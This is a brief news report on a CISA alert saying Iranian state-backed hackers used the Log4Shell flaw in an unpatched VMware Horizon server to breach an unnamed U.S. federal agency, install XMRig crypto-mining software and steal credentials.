Hackers backed by the Iranian regime broke into the network of a U.S. federal government agency and used that access to install cryptocurrency mining software, the Cybersecurity and Infrastructure Security Agency (CISA) said in an alert on Wednesday.
Officials first noticed evidence of advanced persistent threat (APT) activity on the agency’s network in April of this year and determined that it had been compromised since at least February.
The hackers exploited a vulnerability to install XMRig crypto mining software and compromise credentials in the network.
CISA did not identify the compromised agency, but said that it was publishing the alert to “help network defenders detect and protect against related compromises.”
The Iranian-backed hackers used the Log4Shell vulnerability in an unpatched VMware Horizon server, which was first identified last December.
“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities,” CISA said Wednesday.
Iran’s Islamic Revolutionary Guard Corps frequently uses contractors in the country’s private sector to orchestrate state-sponsored cyberattacks, according to CISA.
It’s unclear if the hackers installed cryptocurrency mining software to enrich themselves or at the behest of the Iranian regime, which has increasingly turned to crypto to evade sanctions in recent years.